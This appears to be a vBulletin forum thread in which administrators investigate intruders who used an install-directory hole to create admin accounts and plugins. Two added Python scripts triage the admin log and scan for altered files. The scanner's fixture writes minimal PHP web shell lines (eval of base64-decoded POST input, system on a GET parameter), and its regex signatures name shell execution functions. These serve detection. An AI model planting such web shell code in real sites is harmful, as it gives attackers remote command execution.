A new type hack method?

  • runawayjim
    New Member
    • May 2012
    • 2
    • 4.1.x

    #31
    My ajax_start plugin seems to be failing. The code in it looks suspect, but it could be normal.

    There is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not.

    Comment

    • ToddG
      New Member
      • Mar 2011
      • 3
      • 4.1.x

      #32
      Originally posted by KryptonSite
      I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

      I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
      This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.

      Comment

      • DemOnstar
        Senior Member
        • Nov 2012
        • 1912

        #33
        Originally posted by runawayjim
        My ajax_start plugin seems to be failing. The code in it looks suspect, but it could be normal.

        There is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not.
        I did a quick search for fuhosin.php and came up with this.


        May not be relevant but there you go...


        Comment

        • kiss of death
          Member
          • May 2008
          • 64
          • 3.7.x

          #34
          Originally posted by ToddG

          This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.
          The person that added themselves to my forum deleted themselves afterwards. Go to admincp>Statistics & Logs>controlpanellog>

          Show entries by:
          blank space at the top (if they deleted themselves)
          or select their name if they're still there.

          I got:
          Code:
           ID      Username  Time                  Script      Action    Extra info        IP address
           102106  N/A       18:13, 30th Aug 2013  user.php    kill      user id = 333162  198.203.28.247
           102105  N/A       18:13, 30th Aug 2013  user.php    remove    user id = 333162  198.203.28.247
           102104  N/A       18:13, 30th Aug 2013  user.php    edit      user id = 333162  198.203.28.247
           102103  N/A       18:13, 30th Aug 2013  user.php    find                        198.203.28.247
           102102  N/A       18:13, 30th Aug 2013  user.php    modify                      198.203.28.247
           102101  N/A       18:13, 30th Aug 2013  plugin.php                              198.203.28.247
           102100  N/A       18:13, 30th Aug 2013  plugin.php  kill      plugin id = 8305  198.203.28.247
           102099  N/A       18:13, 30th Aug 2013  plugin.php  delete    plugin id = 8305  198.203.28.247
           102098  N/A       18:13, 30th Aug 2013  plugin.php  modify                      198.203.28.247
           102097  N/A       18:05, 30th Aug 2013  plugin.php                              198.203.28.247
           102096  N/A       18:05, 30th Aug 2013  plugin.php  doimport                    198.203.28.247
           102095  N/A       18:04, 30th Aug 2013  plugin.php  files                       198.203.28.247
          From the looks of it they created a plugin, then deleted it, then created a user and deleted that. I can't find any modified files on my server and I don't have the plugins that other people have. The question is, why give themselves access and take it away? I've looked through everything and can't find anything out of place.

          Comment
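The check described in the post above (pull the Control Panel Log and look for an admin account that created something, used it and removed it again from one address) can be scripted. The block below is an added example, not code from the thread or from vBulletin: it takes the log rows in the shape shown above, transcribed by hand into a pipe-separated sample, groups them by source IP and reports addresses that both created and removed a plugin or user. The action names it keys on (doimport, edit, kill, delete, remove) are the ones visible in the post; other vBulletin versions may log different names, so treat those sets as assumptions.

```python
"""Triage a vBulletin Control Panel Log for create-then-delete admin bursts."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: the rows of the Control Panel Log quoted in the thread,
# transcribed as log id | username | time | script | action | extra info | IP.
SAMPLE_LOG = """\
102106|N/A|18:13, 30th Aug 2013|user.php|kill|user id = 333162|198.203.28.247
102105|N/A|18:13, 30th Aug 2013|user.php|remove|user id = 333162|198.203.28.247
102104|N/A|18:13, 30th Aug 2013|user.php|edit|user id = 333162|198.203.28.247
102103|N/A|18:13, 30th Aug 2013|user.php|find||198.203.28.247
102102|N/A|18:13, 30th Aug 2013|user.php|modify||198.203.28.247
102101|N/A|18:13, 30th Aug 2013|plugin.php|||198.203.28.247
102100|N/A|18:13, 30th Aug 2013|plugin.php|kill|plugin id = 8305|198.203.28.247
102099|N/A|18:13, 30th Aug 2013|plugin.php|delete|plugin id = 8305|198.203.28.247
102098|N/A|18:13, 30th Aug 2013|plugin.php|modify||198.203.28.247
102097|N/A|18:05, 30th Aug 2013|plugin.php|||198.203.28.247
102096|N/A|18:05, 30th Aug 2013|plugin.php|doimport||198.203.28.247
102095|N/A|18:04, 30th Aug 2013|plugin.php|files||198.203.28.247
"""

ORDINAL = re.compile(r"(\d+)(?:st|nd|rd|th)\b")

# Assumption: these are the action names as they appear in the thread's log.
CREATES = {"plugin.php": {"doimport", "insert", "add"},
           "user.php": {"insert", "add", "edit"}}
DESTROYS = {"plugin.php": {"kill", "delete"},
            "user.php": {"kill", "remove"}}


def parse_time(text):
    """Turn the log's '18:13, 30th Aug 2013' into a datetime."""
    return datetime.strptime(ORDINAL.sub(r"\1", text), "%H:%M, %d %b %Y")


def parse_log(text):
    """Parse pipe-separated rows into dicts; blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != 7:
            raise ValueError(f"expected 7 fields: {line!r}")
        logid, admin, when, script, action, extra, ip = fields
        entries.append({"id": int(logid), "admin": admin, "time": parse_time(when),
                        "script": script, "action": action, "extra": extra, "ip": ip})
    return entries


def triage(entries, window_minutes=30):
    """Per source IP, report create-then-destroy activity on plugins or users.

    'burst' is True when all rows from that IP fit inside window_minutes;
    'orphaned_actor' is True when the username column is N/A, i.e. the
    acting admin account no longer exists (it deleted itself).
    """
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e)
    findings = {}
    for ip, rows in by_ip.items():
        rows.sort(key=lambda r: (r["time"], r["id"]))
        reasons = []
        for script in ("plugin.php", "user.php"):
            acts = {r["action"] for r in rows if r["script"] == script}
            made, gone = acts & CREATES[script], acts & DESTROYS[script]
            if made and gone:
                reasons.append(f"{script}: {'/'.join(sorted(made))} "
                               f"then {'/'.join(sorted(gone))}")
        if not reasons:
            continue
        span = rows[-1]["time"] - rows[0]["time"]
        findings[ip] = {
            "first": rows[0]["time"],
            "last": rows[-1]["time"],
            "burst": span <= timedelta(minutes=window_minutes),
            "orphaned_actor": any(r["admin"] == "N/A" for r in rows),
            "objects": sorted({r["extra"] for r in rows if r["extra"]}),
            "reasons": reasons,
        }
    return findings


if __name__ == "__main__":
    for ip, finding in triage(parse_log(SAMPLE_LOG)).items():
        print(ip, finding)
```

Run against the quoted rows it reports one address, active for nine minutes, with a plugin imported then killed and a user edited then killed, and the actor column empty. Those object ids (plugin 8305, user 333162) are the things to look for in the database dump and the backup, since the log records the deletion but not what the plugin contained.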

          • djsteve007
            New Member
            • Dec 2012
            • 8
            • 3.8.x

            #35
            Originally posted by kiss of death

            From the looks of it they created a plugin, then deleted it, then created a user and deleted that. I can't find any modified files on my server and I don't have the plugins that other people have. The question is, why give themselves access and take it away? I've looked through everything and can't find anything out of place.

            While I still had my forum running, someone suggested running an admincp tool that checks for unknown or unrecognized files; my system found several (and I have not modded much at all from the original install).

            What I found odd was the SQL injections: they tried to inject all kinds of tags and code for various video sites directly into the SQL database. They were not trying to add posts or anything, just doing straight SQL injections. Not sure whether there would be any way to check the SQL file and see what has been changed in the last 4 days. If not, I am just pulling the forums completely so they cannot compromise anything else on my server.

            Comment
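The "checks for unknown or unrecognized files" tool mentioned above is vBulletin's Suspect File Versions diagnostic, which compares the installed files with the version's own manifest. The same check can be done outside AdminCP against a clean download of the same version, which also catches a dropped file like the fuhosin.php from post #31 and a core include with a shell appended. The block below is an added example, not code from the thread or from vBulletin: it hashes both trees, lists unknown, missing and modified files, and greps the new or changed PHP for a few backdoor constructs. The signature list and the fixture files are constructed for the example and are not real vBulletin code.

```python
"""Compare a live vBulletin tree with a clean copy and scan changed PHP."""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructs that almost never appear in legitimate forum code.
# Assumption: illustrative list, not an exhaustive web shell detector.
SUSPICIOUS = [
    (re.compile(rb"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
     "eval of decoded payload"),
    (re.compile(rb"\b(?:system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
     "shell command built from request input"),
    (re.compile(rb"\bpreg_replace\s*\(\s*['\"][^'\"]*/\w*e\w*['\"]"),
     "preg_replace with /e modifier"),
    (re.compile(rb"\bmove_uploaded_file\s*\("), "file upload handler"),
]


def hash_tree(root):
    """Map each file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(clean, live):
    """Diff two path->hash manifests."""
    both = set(clean) & set(live)
    return {"unknown": sorted(set(live) - set(clean)),
            "missing": sorted(set(clean) - set(live)),
            "modified": sorted(p for p in both if clean[p] != live[p])}


def scan_php(root, paths):
    """Return {path: [reasons]} for PHP files matching any signature."""
    hits = {}
    for rel in paths:
        if not rel.endswith((".php", ".inc", ".phtml")):
            continue
        data = (Path(root) / rel).read_bytes()
        reasons = [label for rx, label in SUSPICIOUS if rx.search(data)]
        if reasons:
            hits[rel] = reasons
    return hits


def audit(clean_root, live_root):
    """Full report: file-level diff plus signature hits on new/changed PHP."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    report = compare(clean, live)
    report["suspicious"] = scan_php(live_root, report["unknown"] + report["modified"])
    return report


def build_fixture(base):
    """Constructed fixture (not real vBulletin files): a 'clean' tree and a
    'live' copy with one dropped file and one core include with a shell
    appended, the two cases the thread describes."""
    base = Path(base)
    for name in ("clean", "live"):
        (base / name / "includes").mkdir(parents=True)
        (base / name / "index.php").write_text("<?php\nrequire_once('./global.php');\n")
        (base / name / "includes" / "functions.php").write_text(
            "<?php\nfunction fetch_ok() { return true; }\n")
    (base / "live" / "fuhosin.php").write_text("<?php eval(base64_decode($_POST['c']));\n")
    with (base / "live" / "includes" / "functions.php").open("a") as fh:
        fh.write("if (isset($_GET['cmd'])) { system($_GET['cmd']); }\n")
    return str(base / "clean"), str(base / "live")


def demo():
    """Build the fixture in a temp dir and audit it."""
    clean, live = build_fixture(tempfile.mkdtemp())
    return audit(clean, live)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

For a real forum, point audit() at an unpacked clean download of the exact installed version and at the live document root; anything in "unknown" that is not a deliberate customisation, and anything in "modified" under includes/, is what the thread's posters were hunting for by hand. The hash comparison is the reliable part; the signature scan only narrows where to read first.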

            • DemOnstar
              Senior Member
              • Nov 2012
              • 1912

              #36
              Originally posted by kiss of death

              From the looks of it they created a plugin, then deleted it, then created a user and deleted that. I can't find any modified files on my server and I don't have the plugins that other people have. The question is, why give themselves access and take it away?
              From that, my assumption is that they came in, stuck something into your database using the plugin thing, then erased the plugin thing to try and cover up what it was they did. Don't want to make you paranoid, but what if they put something into your database that will or can be triggered by time or some other device? Or maybe I am the one that is paranoid?

              The post above also supports my paranoid theory...


              Comment

              • hurricane_sh
                Senior Member
                • Mar 2005
                • 171

                #37
                This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                I couldn't find any other changes though except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time or password-protected admincp/modcp directory.

                A really scary moment.

                Comment

                • kiss of death
                  Member
                  • May 2008
                  • 64
                  • 3.7.x

                  #38
                  Originally posted by DemOnstar

                  From that, my assumption is that they came in, stuck something into your database using the plugin thing, then erased the plugin thing to try and cover up what it was they did. Don't want to make you paranoid, but what if they put something into your database that will or can be triggered by time or some other device? Or maybe I am the one that is paranoid?

                  The post above also supports my paranoid theory...
                  I think you're right. I do a daily backup, so I can see this happened on the 30th; I'll just restore the backup from the 29th to be on the safe side.

                  Comment

                  • DemOnstar
                    Senior Member
                    • Nov 2012
                    • 1912

                    #39
                    Originally posted by kiss of death

                    I think you're right. I do a daily backup, so I can see this happened on the 30th; I'll just restore the backup from the 29th to be on the safe side.
                    Best to be on the safe side.
                    After looking up the IP, I see it is in China... http://ip-lookup.net/index.php

                    Oddly enough, that is where I reside...

                    Thanks for your input, this is a learning curve for me too...


                    Comment

                    • DemOnstar
                      Senior Member
                      • Nov 2012
                      • 1912

                      #40
                      Originally posted by hurricane_sh
                      This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                      I couldn't find any other changes though except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time or password-protected admincp/modcp directory.

                      A really scary moment.
                      Have you checked admincp>Statistics & Logs>controlpanellog? As above?


                      Comment

                      • kiss of death
                        Member
                        • May 2008
                        • 64
                        • 3.7.x

                        #41
                        I'm still wondering how they managed to change people's index pages just from creating an admin account, which means they got FTP access or cPanel access, which isn't available just for having an admin account?

                        I see the original poster of this thread had vbseo installed. Just out of interest, can you go to AdminCP > Settings > Options > vBSEO Search Engine XML Sitemap,

                        scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used there is the same as your cPanel or FTP account?

                        This is the only way I can currently think of that they might have gained higher access, because the password is not encrypted there and any admin can view it, and as we've seen before, people continue to use the same passwords for everything, which is how they get caught out.

                        Comment

                        • DemOnstar
                          Senior Member
                          • Nov 2012
                          • 1912

                          #42
                          Originally posted by kiss of death

                          scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used there is the same as your cPanel or FTP account?
                          You may have something there?
                          Have to wait and see the results.


                          Comment

                          • Reignman
                            New Member
                            • Dec 2011
                            • 25
                            • 4.1.x

                            #43
                            Originally posted by kiss of death
                            I'm still wondering how they managed to change people's index pages just from creating an admin account, which means they got FTP access or cPanel access, which isn't available just for having an admin account?

                            I see the original poster of this thread had vbseo installed. Just out of interest, can you go to AdminCP > Settings > Options > vBSEO Search Engine XML Sitemap,

                            scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used there is the same as your cPanel or FTP account?

                            This is the only way I can currently think of that they might have gained higher access, because the password is not encrypted there and any admin can view it, and as we've seen before, people continue to use the same passwords for everything, which is how they get caught out.
                            Are you pointing this question to me? If so, I can say that it's not about vbseo. At first, I was suspecting plugins (especially vbseo) too, but I am convinced that it is not about plugins.

                            And no, I never use the same passwords.

                            You can easily change people's index pages via the style manager if you have an admin account, btw.

                            Comment


                            • DemOnstar commented
                              Then I guess that one is ruled out...

                            • Reignman commented
                              Yes, also if you search in search engines for hacked pages, you can see some of them have vbseo and some of them don't.
                          • kiss of death
                            Member
                            • May 2008
                            • 64
                            • 3.7.x

                            #44
                            Originally posted by Reignman
                            You can easily change people's index pages via the style manager if you have an admin account, btw.
                            Yeah, but a few comments I read said that people had had their index.php and forum.php files switched, and they just put the originals back and everything was fine.

                            Also, it wasn't vbseo itself I was suspecting, it was the vbseo sitemap generator, which people can use without vbseo. Before vb4, vBulletin had no built-in sitemap generator and everyone was using the vbseo one because it was free. When vb4 came out a lot of people continued to use it, and I don't believe there is a problem with it, only the fact that some people use the same passwords and it's clearly shown in a normal field in admincp.

                            Yours was obviously done via the style manager or it wouldn't still say vbseo at the bottom of the page; I was just curious.

                            I'm just really confused as to why someone with that level of access would try to cover their tracks by removing the plugin and user account but not prune the logs.

                            Comment

                            • vb4
                              New Member
                              • Oct 2010
                              • 19

                              #45
                              Originally posted by Reignman
                              I've searched in templates and I saw that he changed "FORUMHOME" script, I reverted it and everything turned back normal.
                              Same happened to me. Deleted "install" folder, found two admin accounts (deleted them), found three plugin entries (deleted them), and also found entries in one of the database tables.

                              That FORUMHOME entry in the database, how do I fix it? Copying vB files via FTP will not help.

                              Thanks

                              P.S.
                              Well, I just saw a REVERT button...

                              Comment
